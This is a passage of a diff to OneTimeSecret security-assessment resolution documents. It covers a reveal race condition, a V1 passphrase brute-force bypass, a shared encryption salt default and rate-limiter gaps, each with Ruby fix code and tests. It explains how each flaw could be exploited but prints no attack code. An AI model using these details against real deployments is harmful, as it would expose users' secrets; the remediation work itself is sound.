+as `InviteTokenRateLimiter` does):
+1. **Per-IP lockout:** N+1 `/secret` from one IP within the window → `LimitExceeded`; the (N+1)th email is
+   **not** enqueued.
+2. **Per-domain ceiling:** submissions spread across many IPs to one domain hit the domain cap → throttled.
+3. **Isolation:** abuse on domain A does not throttle domain B.
+4. **/validate throttled:** repeated `/validate` probes from one IP hit the limit.
+5. **Happy path:** a legitimate single submission still creates the secret and enqueues exactly one email.
+6. **IP fallback:** with `metadata[:ip]` absent, the per-domain ceiling still applies (no unbounded path).
+
+## Effort & risk
+
+- **Effort:** Low–Medium — one new limiter module (largely copied from `FeedbackRateLimiter`) plus wiring into
+  two logic classes and specs.
+- **Back-compat:** legitimate tip volume must stay under the limits; tune `MAX_SUBMISSIONS`/`RATE_WINDOW` per
+  the deployment's expected intake and expose them as constants (as the existing limiters do).
+- **Risk:** Low. The feature is opt-in; the limiter only rejects abusive volume and preserves the single
+  legitimate submission path. Confirm the upstream-limiter question first to finalize the Low-vs-Medium
+  severity.

--- a/docs/security/assessment-2026-06-22/resolutions/AZ9-incoming-submit-rate-limit.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ9-incoming-submit-rate-limit.md
@@ -1,7 +1,7 @@
 # AZ9 — No in-logic rate limit on anonymous incoming /secret and /validate (mail-flood / Redis-flood abuse)
 
 - **Severity:** Low–Medium — **NEEDS-VALIDATION** (Medium absent any upstream limiter; Low if one exists)
-- **Status:** Proposed fix
+- **Status:** Proposed fix — **corrected 2026-06-24 (snippet defect fixed in place; see callout)**
 - **Affects default config?** Only when the **incoming** feature is enabled for a deployment/domain (it is
   off unless configured), but anonymous-by-design when on
 - **Related:** finding 02 F9; F10 (invite limiter IP resolution); existing limiters
@@ -9,6 +9,16 @@
 - **Primary files:** `apps/api/incoming/logic/create_incoming_secret.rb:67-99,216-239`,
   `apps/api/incoming/logic/validate_recipient.rb`, `apps/api/incoming/routes.txt:22-24`,
   `lib/onetime/security/feedback_rate_limiter.rb` (pattern to mirror)
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §5 (compile-level defects)).**
+> Verdict: **unsound as written** — the fix snippet does not compile/run. `client_ip` and `domain_key` are
+> local variables defined in `raise_concerns` (step 2, `:98-99`) but referenced again inside `process`
+> (`:112`), where they are out of scope → `record_incoming_submission!(domain_key, client_ip)` raises
+> `NameError` on every successful submission.
+> **Correction:** compute `client_ip`/`domain_key` within the same scope where they are used, or thread them
+> as method arguments (e.g. a private `incoming_rate_limit_keys` helper that both `raise_concerns` and
+> `process` call, or set `@client_ip`/`@domain_key` in `raise_concerns` and read the ivars in `process`). The
+> `record!` call must see the same values the `check!` call bucketed on. Severity unchanged (Low).
 
 ## Problem (recap)
 
@@ -95,9 +105,10 @@ not affect others.
    include Onetime::Security::IncomingRateLimiter
 
    def raise_concerns
-     client_ip  = @strategy_result&.metadata&.dig(:ip) || @strategy_result&.metadata&.dig('ip')
-     domain_key = display_domain.to_s.empty? ? 'canonical' : display_domain
-     check_incoming_rate_limit!(domain_key, client_ip)   # fail-closed on abuse
+     # corrected 2026-06-24: stash on ivars so `process` can reuse the same keys (locals were out of scope)
+     @client_ip  = @strategy_result&.metadata&.dig(:ip) || @strategy_result&.metadata&.dig('ip')
+     @domain_key = display_domain.to_s.empty? ? 'canonical' : display_domain
+     check_incoming_rate_limit!(@domain_key, @client_ip)   # fail-closed on abuse
 
      resolver.require_domain_entitlement!('incoming_secrets')
      # ... existing validation ...
@@ -109,7 +120,8 @@ not affect others.
      raise_form_error 'Failed to create secret' unless @greenlighted
      update_customer_stats
      send_recipient_notification          # the rate-limited side effect
-     record_incoming_submission!(domain_key, client_ip)   # count successful sends
+     # corrected 2026-06-24: read ivars set in `raise_concerns` (bare locals raised NameError here)
+     record_incoming_submission!(@domain_key, @client_ip)   # count successful sends
      success_data
    end
    ```

--- a/docs/security/assessment-2026-06-22/resolutions/C1-one-time-reveal-atomicity.md
+++ b/docs/security/assessment-2026-06-22/resolutions/C1-one-time-reveal-atomicity.md
@@ -4,7 +4,7 @@
 - **Status:** Proposed fix
 - **Affects default config?** **Yes** (anonymous secret sharing)
 - **Related:** finding 03 F1; reproduction in `../poc/race_reveal_model.rb`, `../poc/_reveal_worker.rb`,
-  evidence `../evidence/race_poc_output.txt`
+  evidence `../evidence/race_poc_output.md`
 - **Primary files:** `lib/onetime/models/secret/features/secret_state_management.rb`,
   `apps/api/v2/logic/secrets/reveal_secret.rb`, `apps/api/v1/logic/secrets/show_secret.rb`,
   `apps/api/v2/logic/secrets/burn_secret.rb`, `familia/lib/familia/horreum/{persistence,database_commands}.rb`

--- a/docs/security/assessment-2026-06-22/resolutions/C1-one-time-reveal-atomicity.md
+++ b/docs/security/assessment-2026-06-22/resolutions/C1-one-time-reveal-atomicity.md
@@ -1,0 +1,125 @@
+# C1 — One-time reveal/burn is not concurrency-safe (atomic consume)
+
+- **Severity:** High — **PoC-confirmed** (12/12 parallel processes obtained the same secret's plaintext)
+- **Status:** Proposed fix
+- **Affects default config?** **Yes** (anonymous secret sharing)
+- **Related:** finding 03 F1; reproduction in `../poc/race_reveal_model.rb`, `../poc/_reveal_worker.rb`,
+  evidence `../evidence/race_poc_output.txt`
+- **Primary files:** `lib/onetime/models/secret/features/secret_state_management.rb`,
+  `apps/api/v2/logic/secrets/reveal_secret.rb`, `apps/api/v1/logic/secrets/show_secret.rb`,
+  `apps/api/v2/logic/secrets/burn_secret.rb`, `familia/lib/familia/horreum/{persistence,database_commands}.rb`
+
+## Problem (recap)
+
+The reveal/burn flow is a non-atomic check-then-act. Each request: loads the secret, checks
+`viewable?`/in-memory `state`, decrypts, then calls `revealed!`/`burned!` which calls `destroy!`
+unconditionally. Nothing binds the state check to the delete, so two concurrent requests for the same
+identifier each pass the gate, each decrypt, and each return the plaintext — defeating the single-use
+guarantee (and its tamper-evidence: a victim still sees a successful one-time reveal even though an
+interceptor already read it).
+
+```ruby
+# secret_state_management.rb:60+
+def revealed!
+  return unless state?(:new) || state?(:previewed)   # in-memory @state, loaded at request start
+  md = load_receipt; md&.revealed!
+  @state = 'revealed'; @ciphertext = nil
+  destroy!                                            # DEL — not conditioned on current state
+end
+```
+
+`destroy!` wraps deletes in `MULTI/EXEC` but **without `WATCH`** and **without a state precondition**
+(`familia/.../persistence.rb:558`, `database_commands.rb:252`).
+
+### Why a single MRI process hid it (and production won't)
+
+Within one MRI process the GIL serialises the CPU-bound decrypt/routing, so the first request usually
+finishes `destroy!` before others load (natural PoC = 1/1). Production runs **clustered Puma (multiple
+worker processes)** and typically a network Redis; two simultaneous requests for the same link run on two
+processes with no shared GIL, and the load→check→decrypt→destroy window (several Redis round-trips, plus
+Argon2 for passphrase secrets) is wide. The multi-process PoC reproduced **12/12**.
+
+## Root cause
+
+The authoritative "this secret has been consumed" decision lives in application memory, not in a single
+atomic server-side operation. The check (`viewable?`/`state?`) and the mutation (`destroy!`) are separate
+round-trips with no optimistic-lock or conditional delete between them.
+
+## Prescribed resolution
+
+Collapse **check → claim → destroy** into one atomic, single-winner server-side operation, and only
+decrypt/return the value to the winner. The codebase already ships the right primitives —
+`Familia::Lock` (SETNX+Lua) and `atomic_write(watch_keys:, pre_check:)` (WATCH+MULTI/EXEC) — and uses
+them for org/domain creation; apply the same discipline to the crown-jewel path.
+
+### Option A (preferred) — atomic claim via Lua (`HGETALL`+`DEL` conditioned on state)
+
+Add a model method that atomically reserves-and-removes the secret, returning the encrypted payload only
+to the caller that wins:
+
+```ruby
+# Onetime::Secret — runs server-side; exactly one caller gets the fields, the rest get nil.
+CONSUME_LUA = <<~LUA
+  local st = redis.call('HGET', KEYS[1], 'state')
+  if st == 'new' or st == 'previewed' then
+    local data = redis.call('HGETALL', KEYS[1])
+    redis.call('DEL', KEYS[1])
+    return data
+  end
+  return nil
+LUA
+
+def consume!            # returns the field hash if this caller won, else nil
+  raw = dbclient.eval(CONSUME_LUA, keys: [dbkey])
+  return nil if raw.nil? || raw.empty?
+  Hash[*raw]            # winner only
+end
+```
+
+Caller flow (reveal):
+
+```ruby
+fields = secret.consume!                       # atomic single-winner
+raise OT::MissingSecret unless fields          # lost the race / already consumed
+# rebuild ciphertext from fields, then decrypt — only the winner reaches here
+@secret_value = decrypt_from(fields)
+update_receipt_and_counters(fields)            # md.revealed!, secrets_shared, etc.
+```
+
+Passphrase-protected secrets: verify the passphrase **before** `consume!` using a read-only load (the
+existing `PassphraseRateLimiter` still applies); only `consume!` on correct passphrase + `continue`.
+This keeps "wrong passphrase doesn't burn the secret" behaviour while making the actual reveal atomic.
+
+### Option B — `WATCH` + `MULTI/EXEC` with a state precondition
+
+Use the existing `atomic_write(watch_keys: [dbkey], pre_check: -> { reload; state new/previewed })`
+machinery: WATCH the key, re-read state, and inside MULTI set `state=revealed` + delete; retry/deny on
+abort. Functionally equivalent; Option A is one round-trip and simpler to reason about.
+
+### Option C — `Familia::Lock` around reveal/burn
+
+Wrap the consume in `Familia::Lock` keyed on the identifier. Correct, but adds a lock key + failure modes
+(stale locks); prefer A unless a lock is needed for broader invariants.
+
+### Cross-cutting
+
+- Apply identically to **burn** (`burned!`) and the **v1/v3** reveal paths — all funnel through the same
+  non-atomic model methods, so fixing `consume!`/`revealed!`/`burned!` covers every API version.
+- Keep "decrypt happens only after a successful claim" — never decrypt-then-claim.
+- Receipt/owner counter updates move to the winner, after the claim.
+
+## Test / verification
+
+- Add a concurrency regression test driven by the multi-process PoC harness
+  (`../poc/_setup_secret.rb` + `_reveal_worker.rb`): N independent processes reveal the same id; assert
+  **exactly one** returns the plaintext and the rest get `MissingSecret`.
+- Unit test `consume!`: two threads/fibers against a stubbed/real Redis → one hash, one nil.
+- Regression for passphrase secrets: wrong passphrase does **not** consume; correct + `continue` consumes once.
+
+## Effort & risk
+
+- **Effort:** Medium. New `consume!` (model + familia eval), refactor of `reveal_secret.rb` /
+  `show_secret.rb` / `burn_secret.rb` to claim-then-decrypt.
+- **Risk:** Low/medium — touches the core path, so cover with the concurrency test above and the existing
+  reveal/burn specs. Behaviour is unchanged for the single-request happy path.
+- **Priority:** highest — it is the product's defining guarantee and affects the default deployment.

--- a/docs/security/assessment-2026-06-22/resolutions/C2-encryption-domain-separation.md
+++ b/docs/security/assessment-2026-06-22/resolutions/C2-encryption-domain-separation.md
@@ -1,0 +1,202 @@
+# C2 — Encryption HKDF salt & BLAKE2b personalization left at the shared library default
+
+- **Severity:** Medium — **CONFIRMED** in source (defense-in-depth weakening, not direct key recovery)
+- **Status:** Proposed fix
+- **Affects default config?** **Yes** — every OneTimeSecret deployment that does not set these knobs
+  (i.e. all of them) shares the same `'FamilialMatters'` salt/personalization
+- **Related:** finding 03 F2; Familia issues #310 (per-deployment HKDF salt) / #311 (separate AES vs
+  XChaCha20 inputs); C6 (v1 key retirement) touches the same initializer
+- **Primary files:** `lib/onetime/initializers/configure_familia.rb`,
+  `lib/onetime/key_derivation.rb`, `familia/lib/familia/settings.rb`,
+  `familia/lib/familia/encryption/providers/{aes_gcm_provider,xchacha20_poly1305_provider}.rb`,
+  `familia/lib/familia/encryption/manager.rb`
+
+## Problem (recap)
+
+Encrypted fields (`Secret#ciphertext`) are protected with a master key that **is** correctly
+per-deployment — it is HKDF-derived from `site.secret`
+(`lib/onetime/key_derivation.rb:38,52`, used at `configure_familia.rb:66`). But each provider's
+**inner** key-derivation step takes a *second* domain-separation input that the application never
+sets, so it silently falls back to Familia's hardcoded global literal:
+
+```ruby
+# familia/lib/familia/settings.rb:15-16
+@encryption_personalization = 'FamilialMatters'.freeze   # BLAKE2b `personal` (XChaCha20 provider)
+@encryption_hkdf_salt       = 'FamilialMatters'.freeze   # HKDF salt        (AES-GCM provider)
+```
+
+The app's Familia configuration sets only `encryption_keys` and `current_key_version`
+(`configure_familia.rb:68-72`); it never assigns `encryption_hkdf_salt` or
+`encryption_personalization` (confirmed: no non-spec assignment of either exists in `lib/`, `etc/`,
+or `apps/`). Because the default is **non-empty**, the providers' fail-closed guards do not trip:
+
+- AES-GCM `current_hkdf_salt` raises only on nil/empty
+  (`familia/.../aes_gcm_provider.rb:113-121`).
+- XChaCha20 `derive_key` raises only on nil/empty
+  (`familia/.../xchacha20_poly1305_provider.rb:90-101`).
+
+So the weak global salt is used silently. Familia's own settings doc names this exact gap: the
+default "separates Familia's keys from other HKDF users, but NOT one deployment from another"
+(`familia/.../settings.rb:114-117`).
+
+## Root cause
+
+Domain separation for the providers' inner KDF is **opt-in** in Familia (it ships a deliberately
+permissive shared default so the library "just works"), and the OneTimeSecret initializer never
+opts in. The result is that the per-record key derivation
+(`Class:field:identifier` context, `manager.rb:130-167`) is salted/personalized with a constant
+that is identical across every OneTimeSecret installation in the world.
+
+## Bounded impact (read this before prioritising)
+
+This is **defense-in-depth weakening, not a break**:
+
+- The master key is already deployment-unique (HKDF of `site.secret`,
+  `key_derivation.rb:38,52,66`), so an attacker cannot derive another deployment's keys from the
+  shared salt.
+- Every ciphertext still uses a fresh CSPRNG nonce under AEAD (`aes_gcm_provider.rb:71-73`,
+  `xchacha20_poly1305_provider.rb:75-77`), so there is no nonce reuse.
+- What is lost is the per-deployment separation RFC 5869 salt / BLAKE2b personalization is *meant*
+  to provide: cross-deployment HKDF extraction strength and a clean cryptographic boundary between
+  installations. It is the correct kind of thing to fix on a "get it right" basis, but it is not an
+  emergency.
+
+## Prescribed resolution
+
+Set both knobs to **deployment-unique** values derived from `site.secret`, and register the old
+value(s) in salt-history so existing ciphertext keeps decrypting. Familia already supports exactly
+this rotation pattern (see "Back-compat" below).
+
+### Implementation steps
+
+1. **Add two derivation purposes** to `Onetime::KeyDerivation::PURPOSES`
+   (`lib/onetime/key_derivation.rb:35-39`). These are runtime-only (no `:env_var`), like
+   `familia_enc`. Distinct `info` strings guarantee they are cryptographically independent of the
+   master key and of each other:
+
+   ```ruby
+   PURPOSES = {
+     session:     { info: 'session',       length: 64, env_var: 'SESSION_SECRET' },
+     identifier:  { info: 'verifiable-id', length: 32, env_var: 'IDENTIFIER_SECRET' },
+     familia_enc: { info: 'familia-enc',   length: 32 },
+     # New — domain-separation inputs for Familia's providers (runtime only):
+     familia_enc_salt: { info: 'familia-enc-salt', length: 32 }, # AES-GCM HKDF salt (any length)
+     familia_enc_pers: { info: 'familia-enc-pers', length: 16 }, # BLAKE2b personalization (<=16 bytes)
+   }.freeze
+   ```
+
+   `length: 16` for the personalization is deliberate: BLAKE2b caps `personal` at 16 bytes and
+   Familia's setter raises above that (`settings.rb:95-105`).
+
+2. **Assign both in the initializer**, right after the key block
+   (`configure_familia.rb:68-72`). Use hex for the salt (printable, any length is fine for HKDF)
+   and the raw 16 bytes for personalization (BLAKE2b wants bytes, null-padded to 16 by the provider
+   at `xchacha20_poly1305_provider.rb:101`):
+
+   ```ruby
+   Familia.config.encryption_keys     = { v1: v1_key, v2: v2_key }
+   Familia.config.current_key_version = :v2
+
+   # Per-deployment domain separation for the providers' inner KDF (finding C2 / #310, #311).
+   # Derived from site.secret so each deployment is distinct; independent `info` strings keep
+   # these cryptographically separate from the master key and from each other.
+   Familia.config.encryption_hkdf_salt =
+     Onetime::KeyDerivation.derive_hex(secret_key, :familia_enc_salt)        # AES-GCM
+   Familia.config.encryption_personalization =
+     Onetime::KeyDerivation.derive(secret_key, :familia_enc_pers)            # XChaCha20 (16 raw bytes)
+
+   # Back-compat: data written before this change was salted/personalized with Familia's
+   # global literal. Keep it decryptable. (See "Back-compat" notes below for personalization.)
+   Familia.config.encryption_hkdf_salt_history = ['FamilialMatters']
+   ```
+
+   Note: `derive` returns raw bytes; confirm the personalization value contains no NUL byte before
+   use — the provider rejects embedded NULs (`xchacha20_poly1305_provider.rb:99`). A 16-byte HKDF
+   output can legitimately contain a `0x00`. To stay safe, prefer a NUL-free encoding that still
+   fits 16 bytes, e.g. the first 16 chars of the hex digest:
+
+   ```ruby
+   Familia.config.encryption_personalization =
+     Onetime::KeyDerivation.derive_hex(secret_key, :familia_enc_pers)[0, 16]  # 16 hex chars, NUL-free
+   ```
+
+   This is the recommended form — it is deterministic, deployment-unique, exactly 16 bytes, and
+   cannot trip the NUL guard.
+
+3. **Do not change `current_key_version` or the master keys.** This change only affects the
+   *inner* KDF salt/personalization, not the master key or envelope version, so it composes cleanly
+   with C6.
+
+### Back-compat: keeping old ciphertext readable
+
+The decrypt path is already rotation-aware on the **AES-GCM** side:
+
+- `Manager#decrypt` iterates `provider.hkdf_salts` (current → history → pre-#310 legacy), trying
+  each until the authenticated decrypt succeeds; a wrong salt fails GCM cleanly with no false
+  positive (`familia/.../manager.rb:71-87`).
+- `AESGCMProvider#hkdf_salts` is `[current, *history, LEGACY_HKDF_SALT].compact.uniq`
+  (`aes_gcm_provider.rb:97-101`). Putting `'FamilialMatters'` in `encryption_hkdf_salt_history`
+  makes pre-fix AES-GCM ciphertext decrypt on the first or second attempt.
+
+The **XChaCha20/BLAKE2b** side has **no** personalization-history mechanism: `derive_key` reads a
+single `Familia.config.encryption_personalization` (`xchacha20_poly1305_provider.rb:90-101`) and
+`hkdf_salts` is AES-GCM-only. **Confirm first which provider your deployment actually uses for
+writes.** XChaCha20 has priority 100 vs AES-GCM's 50 (`xchacha20_poly1305_provider.rb:44`,
+`aes_gcm_provider.rb:37`), so if `rbnacl` is installed, XChaCha20 is the default writer and changing
+`encryption_personalization` **will make previously-written XChaCha20 ciphertext undecryptable**.
+
+Two safe options, in order of preference:
+
+- **Option 1 (recommended): change personalization only on the next master-key rotation.** Because
+  secrets are short-lived (TTL-bounded; default 7 days, max 30 days — `base_secret_action.rb:127`),
+  the simplest correct path is: deploy the new personalization **prefixed by a grace window**. If
+  you can tolerate a ≤30-day window where you keep the *old* personalization, set the new value only
+  after the longest possible secret has expired. During the window, set the AES salt (which is
+  history-safe) but leave personalization at the default; after the window, flip personalization too.
+- **Option 2 (no waiting, requires a Familia change): add personalization-history to XChaCha20.**
+  Mirror `hkdf_salts`/`encryption_hkdf_salt_history` with an `encryption_personalization_history`
+  that the manager's decrypt loop also iterates. This is the principled long-term fix and is the
+  natural sibling of #310/#311; it belongs upstream in Familia. Treat it as a prerequisite PR if you
+  cannot accept the grace window.
+
+Given the short secret lifetimes, **Option 1 is the pragmatic, zero-data-loss choice**; ship Option
+2 upstream if instant rotation without a window is a requirement.
+
+### Alternatives considered
+
+- **Leave it at the default.** Rejected: it removes the per-deployment separation the library
+  intends and is trivial to fix. The maintainer asked to get it right.
+- **Use `site.secret` directly as the salt.** Rejected: reusing the root secret as a salt muddies
+  the key hierarchy; a dedicated HKDF purpose with a distinct `info` is cleaner and matches the
+  existing `familia_enc` pattern.
+- **Random per-deployment salt persisted to Redis/config.** Rejected: deriving from `site.secret`
+  is reproducible across restarts and workers with no new state to manage or back up.
+
+## Test / verification
+
+- **Unit (app):** after boot, assert `Familia.config.encryption_hkdf_salt` and
+  `encryption_personalization` are non-empty, deployment-derived, and **not** `'FamilialMatters'`;
+  assert personalization is ≤16 bytes and NUL-free.
+- **Determinism:** two boots with the same `site.secret` produce identical salt/personalization;
+  two different `site.secret` values produce different ones.
+- **Round-trip:** encrypt a `Secret#ciphertext` with the new config, decrypt it back (both
+  providers if `rbnacl` is present).
+- **Back-compat (AES-GCM):** write a ciphertext under `'FamilialMatters'`, then set the new salt +
+  `encryption_hkdf_salt_history = ['FamilialMatters']`, and confirm it still decrypts (exercises the
+  `manager.rb:71-87` loop). A unit test asserting `hkdf_salts` includes the history entry guards the
+  wiring.
+- **Back-compat (XChaCha20):** if Option 2 is taken, add the equivalent personalization-history
+  decrypt test upstream in Familia. If Option 1 is taken, document the grace window in the runbook;
+  no code test applies.
+
+## Effort & risk
+
+- **Effort:** Low for the AES-GCM-only / Option-1 path (two `derive_*` calls + two purposes +
+  history entry). Medium if Option 2 (Familia personalization-history) is required.
+- **Risk:** **Data-loss risk is the whole game here.** The salt change is safe due to existing
+  history support; the personalization change is **not** safe for XChaCha20 without either the grace
+  window (Option 1) or upstream history support (Option 2). Confirm the active write provider before
+  shipping. The master key and envelope are untouched, so there is no interaction with key rotation
+  or C6.
+- **Priority:** Medium — after C1 (atomicity) and C3 (V1 rate limit). Worth doing carefully rather
+  than quickly.

--- a/docs/security/assessment-2026-06-22/resolutions/C3-v1-passphrase-rate-limit.md
+++ b/docs/security/assessment-2026-06-22/resolutions/C3-v1-passphrase-rate-limit.md
@@ -1,0 +1,155 @@
+# C3 — V1 reveal path has no passphrase rate limiting
+
+- **Severity:** Medium — **CONFIRMED** in source
+- **Status:** Proposed fix
+- **Affects default config?** **Yes, if the V1 API is mounted** — V1 secret routes are wired in
+  `apps/api/v1/controllers/index.rb` and remain routable
+- **Related:** finding 03 F3; finding 03 F4 / C4 (the rate-limiter's own check/record gap);
+  C1 (atomic reveal — the same V1 path is also non-atomic)
+- **Primary files:** `apps/api/v1/logic/secrets/show_secret.rb`,
+  `apps/api/v1/controllers/index.rb`,
+  `lib/onetime/security/passphrase_rate_limiter.rb`,
+  `apps/api/v2/logic/secrets/{reveal_secret,show_secret}.rb` (the reference implementation)
+
+## Problem (recap)
+
+The per-secret passphrase brute-force protection — `Onetime::Security::PassphraseRateLimiter`
+(5 attempts / 10 min → 30 min lockout, `lib/onetime/security/passphrase_rate_limiter.rb:28-34`) —
+is wired only into the **V2** logic. Both V2 entry points include the module and call it:
+
+- `RevealSecret` includes it (`reveal_secret.rb:35`), checks before verifying
+  (`:68`), and records on failure (`:194`).
+- `ShowSecret` includes it (`show_secret.rb:20`), checks (`:53`), records/clears (`:66-70`).
+
+The **V1** `ShowSecret` does **neither**. It does not include the module, and `process` calls
+`secret.passphrase?(passphrase)` with no attempt counting or lockout:
+
+```ruby
+# apps/api/v1/logic/secrets/show_secret.rb:26-31
+def raise_concerns
+  raise OT::MissingSecret if secret.nil? || !secret.viewable?
+end
+
+def process
+  @correct_passphrase = !secret.has_passphrase? || secret.passphrase?(passphrase)
+  ...
+```
+
+There **is** a coarse read-rate-limit at the controller level
+(`check_rate_limit!(:show_secret, V1_RATE_LIMIT_MAX_READS)`, `index.rb:154`), but that is a
+per-caller (IP/session) read throttle, **not** a per-secret passphrase lockout. It does not lock the
+*secret* after N wrong passphrases, and it does not share state with the V2 limiter.
+
+### Why this is exploitable
+
+If V1 is mounted (it is, by default — `index.rb:157` constructs
+`V1::Logic::Secrets::ShowSecret`), an attacker can brute-force a passphrase-protected secret through
+V1 with no per-secret lockout: Argon2id (`passphrase_hashing.rb:48-62`) slows each guess but does
+not stop online guessing, and weak passphrases fall quickly. Worse, **V1 attempts do not count
+against the V2 lockout**, so even a deployment that relies on V2's protection is bypassable by
+pointing the guesses at V1.
+
+## Root cause
+
+Passphrase rate limiting was added to the V2 logic only; the older V1 `ShowSecret` (a separate class,
+`V1::Logic::Base` subclass) was never retrofitted. The protection lives in the logic layer, so any
+API version that does not include the mixin is unprotected — and the limiter keys on the **secret
+identifier**, so all versions should share one bucket but only V2 currently writes to it.
+
+## Prescribed resolution
+
+Pick one of two paths. **Both are acceptable; prefer (B) if V1 still has real consumers, (A) if it
+can be sunset.**
+
+### Option A (preferred if feasible) — retire / disable the V1 secrets endpoints
+
+If V1 is deprecated, the cleanest long-term fix is to stop routing it. Gate the V1 secret actions
+(`show_secret`, `burn_secret`, `conceal_secret`, `generate_secret` in `index.rb`) behind a config
+flag (default off) or remove the routes, returning `410 Gone`/`404`. This eliminates the unprotected
+path entirely rather than maintaining parallel protection.
+
+**Confirm first:** check telemetry/access logs for live V1 secret traffic and any first-party
+clients (CLI, integrations) pinned to V1 before disabling. If V1 is in active use, take Option B.
+
+### Option B — wire the same limiter into V1 `ShowSecret`
+
+Mirror the V2 implementation exactly so the two paths share the **same** Redis bucket (the limiter
+keys on `secret.identifier`, `passphrase_rate_limiter.rb:134-139`, via
+`Onetime::Secret.dbclient`, `:144-146` — so it is self-contained and needs no `redis` helper from
+the host class).
+
+#### Implementation steps
+
+1. **Require + include** the mixin (matching `reveal_secret.rb:5,35`):
+
+   ```ruby
+   # top of apps/api/v1/logic/secrets/show_secret.rb
+   require 'onetime/security/passphrase_rate_limiter'
+
+   class ShowSecret < V1::Logic::Base
+     include Onetime::Security::PassphraseRateLimiter
+   ```
+
+2. **Check before verifying**, in `raise_concerns` (mirrors `reveal_secret.rb:68` /
+   `show_secret.rb:53`). The check must run *before* `process` calls `passphrase?`:
+
+   ```ruby
+   def raise_concerns
+     raise OT::MissingSecret if secret.nil? || !secret.viewable?
+     check_passphrase_rate_limit!(secret.identifier) if secret.has_passphrase?
+   end
+   ```
+
+3. **Record on failure / clear on success**, in `process`. V1's `process` computes
+   `@correct_passphrase` at line 31; branch on it the way V2's `show_secret.rb:63-71` does:
+
+   ```ruby
+   @correct_passphrase = !secret.has_passphrase? || secret.passphrase?(passphrase)
+
+   if secret.has_passphrase? && !passphrase.to_s.empty?
+     if correct_passphrase
+       clear_passphrase_rate_limit!(secret.identifier)
+     else
+       record_failed_passphrase_attempt!(secret.identifier)
+     end
+   end
+   ```
+
+4. **Surface the lockout.** `check_passphrase_rate_limit!` raises `Onetime::LimitExceeded`
+   (`passphrase_rate_limiter.rb:79-83`). Confirm the V1 controller path renders that as a 4xx (the
+   V1 controller wraps logic in `authorized(...)`; verify `LimitExceeded` maps to the standard
+   limit response rather than a 500). If V1 has no handler, add one mirroring V2.
+
+#### Critical: one shared bucket across V1/V2/V3
+
+The whole point is that **an attacker cannot reset or sidestep the lockout by switching API
+versions**. Because the limiter keys on `secret.identifier` and reads `Onetime::Secret.dbclient`
+directly, V1, V2 (`RevealSecret`, `ShowSecret`), and V3 (`apps/api/v3/logic/secrets.rb:135`
+subclasses V2's `ShowSecret`) all hit `passphrase:attempts:{id}` / `passphrase:locked:{id}`
+automatically once V1 includes the mixin. **Do not introduce a V1-specific key prefix** — that would
+re-open the bypass. Add a regression test that interleaves V1 and V2 failed attempts against the same
+identifier and asserts a single 5-strike lockout governs both.
+
+> Note the interaction with C4: the gate-read and failure-record are still two round-trips, so the
+> small concurrency over-shoot described in C4 applies here too. Fix C4 once and both V1 and V2
+> benefit (the limiter is shared code).
+
+## Test / verification
+
+- **V1 lockout regression:** create a passphrase secret; via the V1 `ShowSecret` path submit 5 wrong
+  passphrases → assert the 6th raises `LimitExceeded` and the controller returns the limit response,
+  not the secret.
+- **Cross-version bucket:** 3 wrong attempts via V1 + 2 via V2 against the same identifier → the next
+  attempt (either version) is locked. This is the key anti-bypass assertion.
+- **Clear on success:** wrong, wrong, then correct → lockout state cleared; subsequent reveal works
+  (subject to the one-time consume, see C1).
+- **Option A path (if chosen):** assert V1 secret routes return 410/404 (or are absent) when the
+  flag is off, and that the V2 path is unaffected.
+
+## Effort & risk
+
+- **Effort:** Low. Option B is ~10 lines mirroring V2; Option A is a routing/flag change.
+- **Risk:** Low. Option B reuses proven, already-deployed code and adds protection without changing
+  the happy path. Option A is only risky if a live consumer depends on V1 — hence "Confirm first".
+- **Priority:** High — second after C1. An unprotected brute-force path against passphrase secrets
+  undercuts the V2 lockout for the same secrets.

--- a/docs/security/assessment-2026-06-22/resolutions/C4-rate-limit-atomicity-argon2-guard.md
+++ b/docs/security/assessment-2026-06-22/resolutions/C4-rate-limit-atomicity-argon2-guard.md
@@ -1,0 +1,187 @@
+# C4 — Passphrase rate-limit check/record gap + test-cost Argon2 selectable by RACK_ENV
+
+- **Severity:** Low/Medium — **CONFIRMED** in source (bounded over-shoot; config-dependent weak hash)
+- **Status:** Proposed fix
+- **Affects default config?** Partially — the non-atomic gate affects the default reveal flow under
+  concurrency; the Argon2 test-cost only bites a misconfigured `RACK_ENV=test` in production
+- **Related:** finding 03 F4; C3 (shared limiter); C1 (the broader non-atomic-consume theme)
+- **Primary files:** `lib/onetime/security/passphrase_rate_limiter.rb`,
+  `lib/onetime/models/features/passphrase_hashing.rb`,
+  `apps/api/v2/logic/secrets/reveal_secret.rb`, `lib/onetime/boot.rb`
+
+## Problem (recap)
+
+Two distinct sub-issues in otherwise-solid passphrase defenses.
+
+### C4a — Non-atomic check-then-record (bounded over-shoot)
+
+The rate-limiter's **increment+expire+lockout** is correctly atomic Lua
+(`passphrase_rate_limiter.rb:37-56`, invoked at `:106-110`). The problem is the *surrounding*
+sequence: the **gate read** and the **failure record** are two separate round-trips with secret
+loading and Argon2 verification between them.
+
+```ruby
+# check (read-only): pipelined GET/EXISTS/TTL — does NOT decrement or reserve
+def check_passphrase_rate_limit!(secret_identifier)   # :64-92
+  is_locked, ttl, current_attempts = redis.pipelined { ... }   # read only
+  raise Onetime::LimitExceeded ... if [true, 1].include?(is_locked)
+end
+
+# record (atomic, but only AFTER a failed verify): INCR + maybe lockout
+def record_failed_passphrase_attempt!(secret_identifier) # :99-117
+  redis.eval(RECORD_ATTEMPT_SCRIPT, ...)
+end
+```
+
+In `RevealSecret`, `check_passphrase_rate_limit!` runs in `raise_concerns` (`reveal_secret.rb:68`)
+and `record_failed_passphrase_attempt!` runs much later in `process` (`:194`). A burst of N
+concurrent guesses can **all read the gate as "not locked" before any of them records a failure**,
+so up to N (not 5) live guesses run in one window. This is a **bounded** over-shoot (the next window
+is locked), not an unlimited bypass — but it widens the brute-force throughput exactly when an
+attacker parallelises.
+
+### C4b — Argon2 test cost selectable purely by `RACK_ENV`
+
+```ruby
+# lib/onetime/models/features/passphrase_hashing.rb:68-74
+def argon2_hash_cost
+  if ENV['RACK_ENV'] == 'test'
+    { t_cost: 1, m_cost: 5, p_cost: 1 }   # 2^5 = 32 KiB, 1 pass  — fast & weak (tests only)
+  else
+    { t_cost: 2, m_cost: 16, p_cost: 1 }  # 2^16 = 64 MiB, 2 passes — production
+  end
+end
+```
+
